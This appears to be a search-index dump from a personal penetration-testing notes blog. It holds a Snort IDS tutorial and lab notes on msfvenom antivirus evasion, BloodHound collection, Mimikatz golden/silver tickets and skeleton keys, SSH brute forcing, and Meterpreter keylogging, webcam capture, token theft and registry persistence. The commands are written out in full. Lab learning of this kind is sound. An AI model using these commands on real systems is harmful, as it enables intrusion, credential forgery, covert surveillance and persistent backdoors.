blog/sharing my notes.\nAlong with all of this stuff, I was confused about whether I should do any more certifications or learn by myself through blogs/articles/books. After 1.5 months of procrastination, I got stuck in a situation where I couldn\u0026rsquo;t decide whether I should do HTB CPTS for knowledge or learn from books.\nFinally, I convinced myself that I would go for books, not certifications. But the problem is that I don\u0026rsquo;t have a lot of money to purchase hacking books, because they are all so expensive for me. So I downloaded PDF copies that are available on the internet for free and started learning.\nI started reading books this month. Currently, I am reading The Ultimate Kali Linux Book, Third Edition, and Automation using Python. These two are my go-tos. Let me tell you now after reading half of both books that this was my best decision for learning and moving forward in this field. Maybe this can differ for you, but for me, this is the right way. I have noticed significant changes in my notes and knowledge since I started using books consistently. I will also share those notes in my blog\u0026rsquo;s notes section.\nTakeaway from all this thinking: Take your time and think wisely about what you want to do and how you want to do it\u0026hellip; don\u0026rsquo;t just believe my opinion, either. This is very important. If you don\u0026rsquo;t think carefully and just jump into something, maybe it can work, but that\u0026rsquo;s just gambling. Take your time to think.\nI don\u0026rsquo;t know how much this strategy will work for me in the future, but I will just keep moving with this because I am loving this way.\nNow what I will be posting next: In the next few months, I will try to post my Pentesting notes along the way of the book\u0026rsquo;s progress. I will also post about different forensics techniques.git Starting in November, I might jump into web application security if possible.\n","permalink":"https://0x-s0M3n4th.github.io/blogs/blog_1/","summary":"\u003cp\u003eThis is going to be a very raw blog, mostly about what I am going to post in the next few months, and what I have been doing for the past few weeks.\u003c/p\u003e\n\u003cp\u003eSo, \u003cem\u003elet\u0026rsquo;s start with what I was doing\u0026hellip;\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eAfter completing \u003ccode\u003eeJPT\u003c/code\u003e certification and learning the basics as well as core concepts of \u003ccode\u003esystem administration\u003c/code\u003e, I got my hands dirty on \u003ccode\u003eCTF platforms\u003c/code\u003e like \u003ccode\u003eHTB\u003c/code\u003e. I took a one-month subscription just to get the experience of it. But not gonna lie, it was not what I expected. First of all, playing \u003ccode\u003eCTFs\u003c/code\u003e on these platforms are very good for many people, and the platforms do a great job. But I didn\u0026rsquo;t like the \u003ccode\u003eCTFish\u003c/code\u003e or more like \u003ccode\u003eobviously vulnerable\u003c/code\u003e experience. I thought the normal HTB boxes would replicate real-world scenarios—hardened systems where normal scans easily fail, and where initial access depends on phishing, social engineering, or hardcore OSINT rather than an obvious open port. That wasn\u0026rsquo;t what I found. But definately \u003ccode\u003eHTB\u003c/code\u003e is a great platform for sharpening your skills under time pressure.\u003c/p\u003e","title":"Why i chose books over certs!"},{"content":"\nHow snort works: snort IDS network implementation: Lab environment: we are not going to use this lab env just for the sake of simplicity of this excersise. Installing snort on ubuntu 20.04 LTS : Before installing make sure promisc mode is on. While installing you will be prompted with to provide the interface name and subnet range sudo apt-get install snort -y cd /etc/snort # The snort config files are sotred there only Now we need to make a backup of the snort config files -\u0026gt; to copy the file we need to have elevated privileges. cp snort.conf snort-backup.conf We are going to make most of the changes inside the snort.conf , the first thing we need to do is to setup the subnet-range that will be used by snort -\u0026gt; vim snort.conf Now we need to disable all the community rules provided inside the config files as we are going to make our own rules. Comment down all the community rules. Except the local rules file, comment everything below it, till this line -\u0026gt; After that we will set up our own rules. Come inside the rules folder, there will be a file named local.rules -\u0026gt; vim /rules/local.rules I have made a first rule for detecting ICMP packets inside our network -\u0026gt; Breakdown of the command -\u0026gt; alert -\u0026gt; It is used for sending an alert when ICMP packets will get detected. icmp -\u0026gt; protocol name, also ping sweeps essentially utilizes ICMP requests. any -\u0026gt; The first \u0026lsquo;any\u0026rsquo; is to detect incoming ICMP request from any external network. any -\u0026gt; second \u0026lsquo;any\u0026rsquo; is to detect request coming from any port. $HOME_NET -\u0026gt; This means any ICMP ping is coming to our home network, which has been configured inside the snort.conf file. Remember the subnet range. any -\u0026gt; Here we usually specify the port number, as ping does not utilize any specific port that\u0026rsquo;s why we are setting it as \u0026lsquo;any\u0026rsquo; port. After this we need to specify an alert message -\u0026gt; (msg: \u0026quot;YOUR MESSAGE\u0026quot; sid -\u0026gt; signature id, provide any unique value rev -\u0026gt; Revisions for specified rules. Now we need to run snort -\u0026gt; snort -q -l /var/log/snort/ -i ens33 -A console -c /etc/snort/snort.conf Then ping from any device to any other device within your network subnet, it will capture those pings and give us alerts. Now i will setup another rule for ssh auth -\u0026gt; vim /etc/snort/rules/local.rules Rule -\u0026gt; In this scenario i am using a vulnerable machine metasploitable2 Now start snort again with the same command. Then i will ssh from my kali machine to \u0026lsquo;metasploitable2\u0026rsquo; -\u0026gt; And everything is detected. SNORPY tool: Making of an ftp alert message using snorpy tool specifically for traffic coming inside the metasploitable2 machine -\u0026gt; Adjust the rules and Copy paste it inside the local.rules file. I ftp\u0026rsquo;ed inside the vulnerable machine and snort detected it-\u0026gt; Community rules -\u0026gt; If you want to download the snort community rules -\u0026gt; Extract the rules, and you can use the community rules by copying pasting them directly inside your snort.conf snort rule for Eternal blue exploit -\u0026gt; If you want to store your logs into an alert file, don\u0026rsquo;t want to be shown in the screen then use this option -\u0026gt; snort -q -l /var/log/snort/ -i ens33 -A fast -c /etc/snort/snort.conf This will store the logs into /vat/log/alert file, and it won\u0026rsquo;t show the output over to the display. Tip To edit bulk lines in vim use this format :563,695s/^/#/ \u0026lsquo;:starting_line,last_line{s}/^/character_you_want_to_add{#}/\u0026rsquo;\n","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/01-snort/intrusion-detection-with-snort/","summary":"\u003cp\u003e\u003cimg alt=\"SNORT_INTRO_1\" loading=\"lazy\" src=\"/images/SNORT_TUT/SNORT_INTRO_1.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"how-snort-works\"\u003eHow snort works:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"SNORT_INTRO_2\" loading=\"lazy\" src=\"/images/SNORT_TUT/SNORT_INTRO_2.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"snort-ids-network-implementation\"\u003esnort IDS network implementation:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"SNORT_INTRO_3\" loading=\"lazy\" src=\"/images/SNORT_TUT/SNORT_INTRO_3.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"lab-environment\"\u003eLab environment:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"SNORT_LAB_ENV\" loading=\"lazy\" src=\"/images/SNORT_TUT/SNORT_LAB_ENV.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ewe are not going to use this lab env just for the sake of simplicity of this excersise.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"installing-snort-on-ubuntu-2004-lts-\"\u003eInstalling snort on ubuntu 20.04 LTS :\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eBefore installing make sure \u003ccode\u003epromisc\u003c/code\u003e mode is on. While installing you will be prompted with to provide the \u003ccode\u003einterface\u003c/code\u003e name and \u003ccode\u003esubnet range\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get install snort -y\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003ecd\u003c/span\u003e /etc/snort \u003cspan class=\"c1\"\u003e# The snort config files are sotred there only\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eNow we need to make a backup of the snort config files -\u0026gt; to copy the file we need to have elevated privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecp snort.conf snort-backup.conf\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"SNORT_FOLD_STRUCT\" loading=\"lazy\" src=\"/images/SNORT_TUT/SNORT_FOLD_STRUCT.png\"\u003e\u003c/p\u003e","title":"Practical Snort"},{"content":"The following techniques used by antimalware solutions to detect potential threats:\nSignature based detection Behavioral based detection Heuristic based detection Platforms for performing static malware analysis:\nhttps://www.virustotal.com/ https://cuckoo.cert.ee/ https://app.any.run/ Encoding payloads with MSFVenom: Metasploit Framework Venom (MSFvenom) is commonly used by penetration testers to craft custom payloads for performing exploitation, remote code execution (RCE), and privilege escalation on targeted systems. RCE allows an attacker to run arbitrary code on a target machine or in a target process without having physical access to the machine. In addition, this tool enables the penetration tester to perform encoding and obfuscation by altering and changing the appearance of the payload without changing its functionality. These methods are commonly used to evade threat detection systems such as IDSs and IPSs.\nDetermine the ip you want to use for getting connection back using ifconfig Next, use the following commands to generate a reverse shell payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=1234 -f exe -o payload1.exe COMMAND BRIEF:\n-p: This enables you to specify the payload. The msfvenom --list payloads command displays a list of all supported payloads for MSFvenom. LHOST: This allows you to specify the call-back address, such as the IP address of Kali Linux as the attacker machine. LPORT: This specifies the listening port on the attacker machine; this port needs to be open before executing the payload on the targeted system. -f: This syntax is used to specify the output format. The msfvenom --list formats command displays a list of supported output formats. -o: This specifies the names of the output file. By default, the payload is stored within the present working directory; use the pwd command to verify the current directory. Next, open the web browser within Kali Linux, go to https://www.virustotal.com, and upload the newly generated payload to determine its detection status Tip Keep in mind that once you have submitted a file to VirusTotal and it has been flagged as malicious, the hash of the malicious file is also shared with other antivirus and security vendors within the industry. Therefore, the time to use your malicious payload is drastically reduced on your target.\nApplying some encodings: let’s apply encoding to the payload using the shikata_ga_nai encoding module and perform 20 iterations of the encoding to reduce the threat detection rating of the custom payload msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.30.1.130 LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 20 -f exe -o payload2_stageless.exe We can\u0026rsquo;t use a staged payload in terms of shikata_ga_nai encoding Because this stager is so small and optimized, encoders can\u0026rsquo;t find enough space or safe instructions to modify. While a stageless payload\u0026rsquo;s large size gives the encoder plenty of code to work with, making it compatible. Next, let’s generate another custom payload and embed it within an executable file: msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.30.1.130 LPORT=1234 -x /usr/share/windows-binaries/whoami.exe -a x86 --platform windows -e x86/shikata_ga_nai -i 20 -f exe -o payload3.exe As shown in the preceding screenshot, the payload3.exe file has a lower detection rating as compared to the previous custom payloads. It’s important to enumerate running services and applications on a targeted system to determine whether the host is running a specific antimalware solution, then test the payload in a lab environment to ensure it is working as expected before delivering to the target. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/02-anti-mlaware-evasion-techniques/","summary":"\u003cp\u003e\u003cem\u003eThe following techniques used by antimalware solutions to detect potential threats:\u003c/em\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eSignature based detection\u003c/li\u003e\n\u003cli\u003eBehavioral based detection\u003c/li\u003e\n\u003cli\u003eHeuristic based detection\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cem\u003ePlatforms for performing static malware analysis:\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.virustotal.com/\"\u003ehttps://www.virustotal.com/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://cuckoo.cert.ee/\"\u003ehttps://cuckoo.cert.ee/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://app.any.run/\"\u003ehttps://app.any.run/\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch1 id=\"encoding-payloads-with-msfvenom\"\u003eEncoding payloads with MSFVenom:\u003c/h1\u003e\n\u003cp\u003e\u003ccode\u003eMetasploit Framework Venom (MSFvenom)\u003c/code\u003e is commonly used by penetration testers to craft custom payloads for performing \u003ccode\u003eexploitation, remote code execution (RCE), and privilege escalation\u003c/code\u003e on targeted systems. RCE allows an attacker to run arbitrary code on a target machine or in a target process without having physical access to the machine. In addition, this tool enables the penetration tester to perform encoding and obfuscation by altering and changing the appearance of the payload without changing its functionality. These methods are commonly used to evade threat detection systems such as IDSs and IPSs.\u003c/p\u003e","title":"Anti-Malware Evasion Techniques"},{"content":"BloodHound is an Active Directory data visualization application that helps penetration testers to efficiently identify the attack path to gain control over a Windows Active Directory domain and forest. In addition, it helps with identifying the misconfigurations and relationships that could be exploited by threat actors. Furthermore, BloodHound uses graph theory to reveal hidden relationships within an Active Directory environment, thus making it easier for penetration testers to visualize privilege escalation paths. Overall, the data in Active Directory must be collected from the organization using a collector such as BloodHound-Python, SharpHound, or AzureHound. Once the data has been collected, it has to be processed by BloodHound, which provides the attack path to domain takeover within an organization.\nThe following is a breakdown for each type of collector used by BloodHound:\nSharpHound is the most commonly used data collector for BloodHound, designed to collect data from on-prem AD environments. BloodHound-Python is an alternative to SharpHound for collecting similar types of data and is most suitable when executing .NET binaries is restricted or monitored. AzureHound is designed to collect data from Azure AD (now MS Entra), allowing BloodHound to analyze and visualize attack paths in cloud environments. Bloodhound setup: Using docker containers: In my case i faced an issue later on so if you also faced the issue then follow the commands after doing docket-compose up , remember to restart your system after performing these commands. After restarting use the command again docker-compose up Make sure your port 8080 is not used by any other service, if that\u0026rsquo;s the case use the following commands to kill the process running on port 8080 sudo netstat -tulnp | grep \u0026#34;8080\u0026#34; sudo kill -9 PID 5. Then again do docker-compose up , you should get messages like these: 6. Now head over to firefox , search http://127.0.0.1:8080 and this page should come up, enter your credentials: 7. This upload page should come up first, ignore the background data: 8. We need to ingest our Domain controller's data using any compromised domain account into bloodhound, this will map the whole network into a visual graph and many more. To do so we need to install another tool called bloodhound-python to gather that data from DC . Use the following steps:\nsudo apt install bloodhound.py bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 10.11.12.128 -c All COMMAND DETAILS:\n-d: Specifies the targeted Active Directory domain. -u: Specifies the username of a valid domain user. -p: Specifies the password for the domain user. -ns: Specifies the name server or IP address of the domain controller. -c: Specifies the collector method. 9. Now upload all of the json files inside bloodhound 10. Then come to the tab Cypher in bloodhound 11. Click on saved queries , then click all domain admins 12. This should provide us the whole info about Domain admins we are facing at this point: 13. We can click on any of the nodes to get more information: 14. This tool can map attack paths also, use the query shortest path to domain admins: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/02-bloodhound/","summary":"\u003cp\u003e\u003ccode\u003eBloodHound\u003c/code\u003e is an Active Directory data visualization application that helps penetration testers to efficiently identify the attack path to gain control over a Windows Active Directory domain and forest. In addition, it helps with identifying the misconfigurations and relationships that could be exploited by threat actors. Furthermore, BloodHound uses \u003ccode\u003egraph theory\u003c/code\u003e to reveal hidden relationships within an Active Directory environment, thus making it easier for penetration testers to visualize privilege escalation paths.\nOverall, the data in Active Directory must be collected from the organization using a collector such as \u003ccode\u003eBloodHound-Python, SharpHound, or AzureHound\u003c/code\u003e. Once the data has been collected, it has to be processed by BloodHound, which provides the attack path to domain takeover within an organization.\u003c/p\u003e","title":"BloodHound"},{"content":"ON THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES 1. GOLDEN TICKET , 2. SILVER TICKET AND 3. SKELETON KEY\nGOLDEN TICKET: A golden ticket is a special token that is created by penetration testers using the Security Identifier (SID) of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT(Pass The Ticket). This is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed by the krbtgt account hash but is encrypted only. This golden ticket allows anyone to impersonate any user with the privileges associated with the impersonated user on systems within the domain. To make this type of attack even more awesome, imagine that changing the password for the krbtgt account has zero effect on mitigating this attack on Active Directory.\nPRACTICAL DEMO: Fire up windows server 2022 and login as either Domain admin/SQLService Make sure mimikatz is installed beforehand. Open powershell with admin privileges, and launch mimikatz. Use Mimikatz to extract the domain SID and the Kerberos TGT account NTLM hash (krbtgt) using the following command: lsadump::lsa /inject /name:krbtgt Next, use Mimikatz to create a golden ticket by providing the domain SID and krbtgt NTLMv1 hash using the following command: kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket The username specified in the preceding command does not necessarily need to be a valid user on the domain. Furthermore, using the ID of 500 allows us to specify the administrator user account on the domain. The /ticket command enables us to specify the name of the ticket when it’s created. The golden ticket is stored offline within the Mimikatz directory. This golden ticket will allow a penetration test to access any system on the domain using the current session.\nCreating a super golden ticket for maximum validity period: kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket /endin command enables us to specify the maximum validity of the ticket in minutes.\npass the ticket with mimikatz: kerberos::pttt golden_ticket To open a Command Prompt with the golden ticket session, use the following Mimikatz command: misc::cmd On the cmd try these 2 command: As shown in the preceding screenshot, when the whoami command is executed, the output shows the sqladmin account is currently logged on to the system but the klist command reveals this Command Prompt session is using the NotAdmin user with the golden ticket. Therefore, you can access any device on the network using the golden ticket on this Command Prompt session. Note As previously mentioned in this chapter, changing the krbtgt account password does not invalidate the tickets created by the krbtgt account; however, checking the password twice will invalidate the tickets.\nLearn more about mimikatz\nSilver ticket: Open the domain controller and login as either service account/DOMAIN ADMIN Then load mimikatz on powershell(Open as admin). Next, retrieve the SID of the domain and the NTLM hashes of a service account with a registered SPN or computer account: lsadump::lsa /patch HASH OF THE DC{HYDRA-DC} Important You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.\n4. Next, let’s use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the Domain Controller (DC1), and the target as the domain controller. The service to impersonate will be the HOST:\nkerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket 5. Now use the following command to perform PTT as well as get a cmd session: SKELETON KEY: Use the following commands to enable the Mimikatz drivers on the disk of the domain controller and create the skeleton key: mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton mimikatz # !- 2. Then open a command prompt using that skeleton key Important When using the skeleton key, you can access any device on the domain using a valid username and the password as Mimikatz. However, keep in mind any host you’re attempting to access with the skeleton key needs to authenticate to the domain controller on the network. If the domain controller reboots, the skeleton key is lost. However, the skeleton key being lost if the domain controller reboots is an important operational detail. Since Mimikatz manipulates authentication processes that are resident in memory, they are not persistent through reboots unless specific measures are taken to ensure persistence.\nOn the new Cmd use the command powershell to spawn a powershell session. Access the domain controller using the following command: Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\\Administrator Provide the password of the domain admin: Use the following commands to verify: Further reading: • Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/ Kerberos • OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/ • OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/ • LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/ T1557/001/ • Active Directory Security – https://adsecurity.org/\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/02-domain-dominance-and-persistence/","summary":"\u003cp\u003e\u003cem\u003eON THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES 1. GOLDEN TICKET , 2. SILVER TICKET AND 3. SKELETON KEY\u003c/em\u003e\u003c/p\u003e\n\u003ch2 id=\"golden-ticket\"\u003eGOLDEN TICKET:\u003c/h2\u003e\n\u003cp\u003eA \u003ccode\u003egolden ticket\u003c/code\u003e is a special token that is created by penetration testers using the \u003ccode\u003eSecurity Identifier (SID)\u003c/code\u003e of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT. The golden ticket allows a penetration tester to gain access to any device within the domain by performing \u003ccode\u003ePTT(Pass The Ticket)\u003c/code\u003e.\nThis is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed by the krbtgt account hash but is encrypted only. This golden ticket allows anyone to impersonate any user with the privileges associated with the impersonated user on systems within the domain. To make this type of attack even more awesome, imagine that changing the password for the \u003ccode\u003ekrbtgt\u003c/code\u003e account has zero effect on mitigating this attack on Active Directory.\u003c/p\u003e","title":"Domain Dominance and Persistence"},{"content":" Now after misconfiguring ssh we will exploit it using some basic techniques. Scanning the target windows server: Performing user enumeration: Open msfconsole Once it\u0026rsquo;s loaded, use this ssh_enumusers module use auxiliary/scanner/ssh/ssh_enumusers 3. Settings: This didn\u0026rsquo;t give any results due to secure OpenSSH server, modern SSH servers are patched against this. If this was an actual pentest we hit the wall, but as we know the username and password, we can try login brute force attacks\nFirst we will try msfconsole's ssh_login module: Options: It will take significant time if you don\u0026rsquo;t have the actual credentials, if you have that\u0026rsquo;s a plus point. NEVER PERFORM BRUTE FORCE ATTACKS IN A INTERNAL NETWORK IN A PENTEST Now if it was an actual scenario, a sysadmin would check the logs immediately, we will do the same: On opening that file you can see logs are continiously getting collected Using medusa tool for brute forcing: medusa -h 192.168.83.140 -U username.txt -P passwords.txt -M ssh ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/02-gaining-access-by-exploiting-ssh/","summary":"\u003col\u003e\n\u003cli\u003eNow after misconfiguring \u003ccode\u003essh\u003c/code\u003e we will exploit it using some basic techniques.\u003c/li\u003e\n\u003cli\u003eScanning the target windows server:\n\u003cimg alt=\"sshe_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/02/sshe_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"performing-user-enumeration\"\u003ePerforming user enumeration:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOpen \u003ccode\u003emsfconsole\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eOnce it\u0026rsquo;s loaded, use this \u003ccode\u003essh_enumusers\u003c/code\u003e module\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euse auxiliary/scanner/ssh/ssh_enumusers\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"sshe_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/02/sshe_2.png\"\u003e\n3. Settings:\n\u003cimg alt=\"sshe_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/02/sshe_3.png\"\u003e\nThis didn\u0026rsquo;t give any results due to secure OpenSSH server, modern SSH servers are patched against this. If this was an actual pentest we hit the wall, but as we know the username and password, we can try \u003ccode\u003elogin brute force attacks\u003c/code\u003e\u003c/p\u003e","title":"Gaining Access by Exploiting SSH"},{"content":" First get a reverse shell from the target machine, in my case it would be Blue and attacker will be kali. Also i have added Blue into the vmnet2 aka PIVOT-NET network. Let\u0026rsquo;s use the Eternal Blue(MS17-010) exploit to get a reverse shell: user interface options: Establishing a Meterpreter interactive session between the compromised system and your attacker machine enables you to perform actions to collect sensitive and confidential information from the target system. The following is a brief list of useful commands that are used within Meterpreter:\nkeyscan_start: Meterpreter begins capturing the keystrokes entered by a user on the compromised host. keyscan_stop: Stops capturing the keystrokes entered by a user on the compromised system. keyscan_dump: Exports the captured keystrokes into a file. screenshot: Meterpreter will capture a screenshot of the desktop on the compromised host. screenshare: Begins a real-time stream showing the live actions performed by a user on the compromised host. record_mic: Meterpreter activates the microphone on the compromised host and begins recording. webcam_list: Displays a list of webcams available on the compromised host. webcam_snap: Activates the webcam on the compromised host and takes a picture. webcam_stream: Begins a live stream from the webcam on the compromised system. search: Using the search –f \u0026lt;filename\u0026gt; command quickly searches on the compromised system for the file. File transfers: To upload a file such as a malicious payload, Meterpreter supports file transfers between the attacker and the compromised host. meterpreter \u0026gt; upload /usr/share/windows-binaries/vncviewer.exe c:\\\\ 2. Spawning a native shell from meterpreter: 3. If we see to the root of the directory and verify if our file is uploaded or not: 4. Use the following command to download a file from the C: directory of the target to the /home/ kali/ directory on Kali Linux:\nmeterpreter \u0026gt; download c:\\\\jack_of_diamonds.png /home/kali/ Important The double backslashes (\\\\) are used as escape characters for Windows-style directory paths and are necessary for Meterpreter to interpret the path correctly\nprivilege escalation using meterpreter: After exploiting a security vulnerability and gaining either a reverse or bind shell, you may not be able to perform administrative actions or tasks on the compromised system due to having low privileges on the compromised machine. Therefore, it’s important to understand the need to escalate your user privileges to a high-privilege user such as the local administrator, a domain administrator, or even the SYSTEM level. Escalating your user privileges on a compromised system simply allows you to modify configurations and perform administrative functions on the victim machine.\nOn Meterpreter, use the getuid command to verify the user privilege that Meterpreter is currently using on the compromised host. Next, execute the use priv command within Meterpreter to load the privilege extension if it’s not loaded already. I am already having NT AUTHORITY\\SYSTEM so it didn\u0026rsquo;t work. Types of tokens: Delegate tokens: This token is created on a system when a user logs in to that system and provides the privileges to allow the user to perform actions that are within the limitation of their user privileges. Additionally, this type of token is created when a user remotely accesses a Windows host using Microsoft’s RDP. Impersonate token: This type of token allows a user to access remote network services such as file shares and network drives across a network. Open the session of reverse shell, then type load incognito , after that list_tokens -u to see the available tokens. If you do a getuid to check your identity, in my case it\u0026rsquo;s already SYSTEM which is the highest privilege possible. So i don\u0026rsquo;t need to impersonate tokens. But you can do that using the command: meterpreter \u0026gt; impersonate_token NT AUTHORITY\\SYSTEM Another technique to impersonate a user such as the local Administrator is to identify a running process on the compromised system that is running using the Administrator’s privileges and steal the token for the process Use the command ps to identify: Let\u0026rsquo;s say i want to migrate to this process: For stealing the token use the command : steal_token PID Lastly, to revert to SYSTEM-level privileges on Meterpreter, use the following rev2self command. Setting up persistence: After remotely exploiting a security vulnerability within a host, the payload is usually delivered, which allows the penetration tester to gain a reverse shell on the target. Since Meterpreter runs within the memory of the target, the session will be terminated when the compromised host loses power or reaches an inactivity timeout. Implementing persistence on the compromised host will ensure the penetration tester always has access to the target whenever it’s online.\nMeterpreter allows penetration testers to remotely enable RDP on a compromised Windows operating system: meterpreter \u0026gt; run post/windows/manage/enable_rdp 2. Use the shell command within Meterpreter to spawn a Windows native shell, then use the net user pentester password1 /add command to create a new user on the compromised host: 3. Metasploit contains two specific exploit modules that enable penetration testers to set up persistence on a compromised Windows host. These modules are as follows:\nexploit/windows/local/persistence exploit/windows/local/registry_persistence Both of these modules will create a payload that modifies the system registry value located within the HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ location and stores the VBS script in the C:\\WINDOWS\\TEMP\\ directory, causing the payload to execute each time the system boots or when a user logs on. These are very dangerous and should be removed when you have completed the technical aspect of the penetration test within the organization. If these payloads are not removed from the registry and the TEMP folder, a threat actor can gain access to the host machine without authentication. Background the session using ctrl + z and then select the exploit/windows/local/persistence module, set the session number, and configure the module to take effect when the system starts up: msf use exploit/windows/local/persistence msf exploit(windows/local/persistence) \u0026gt; set SESSION 1 msf exploit(windows/local/persistence) \u0026gt; set STARTUP SYSTEM msf exploit(windows/local/persistence) \u0026gt; set LHOST 172.30.1.130 LHOST =\u0026gt; 172.30.1.130 msf exploit(windows/local/persistence) \u0026gt; set LPORT 1234 LPORT =\u0026gt; 1234 msf exploit(windows/local/persistence) \u0026gt; set SESSION 5 SESSION =\u0026gt; 5 You can set STARTUP as user also if you are targeting a specific user to login to the system. 2. Setting up the handler for recieving reverse connection\nmsf6 \u0026gt; use exploit/multi/handler msf6 exploit(multi/handler) \u0026gt; set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \u0026gt; set AutoRunScript post/windows/manage/ migrate msf6 exploit(multi/handler) \u0026gt; set LHOST 172.30.1.130 msf6 exploit(multi/handler) \u0026gt; set LPORT 1234 msf6 exploit(multi/handler) \u0026gt; exploit whenever the user/administrator will login the PC you will always recieve a connection back sue to the payload.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/02-post-exploitation-using-meterpreter/","summary":"\u003col\u003e\n\u003cli\u003eFirst get a reverse shell from the target machine, in my case it would be \u003ccode\u003eBlue\u003c/code\u003e and attacker will be kali. Also i have added \u003ccode\u003eBlue\u003c/code\u003e into the \u003ccode\u003evmnet2 aka PIVOT-NET\u003c/code\u003e network.\u003c/li\u003e\n\u003cli\u003eLet\u0026rsquo;s use the \u003ccode\u003eEternal Blue(MS17-010)\u003c/code\u003e exploit to get a reverse shell:\n\u003cimg alt=\"gs_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/02/gs_3.png\"\u003e\n\u003cimg alt=\"gs_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/02/gs_4.png\"\u003e\n\u003cimg alt=\"gs_5\" loading=\"lazy\" 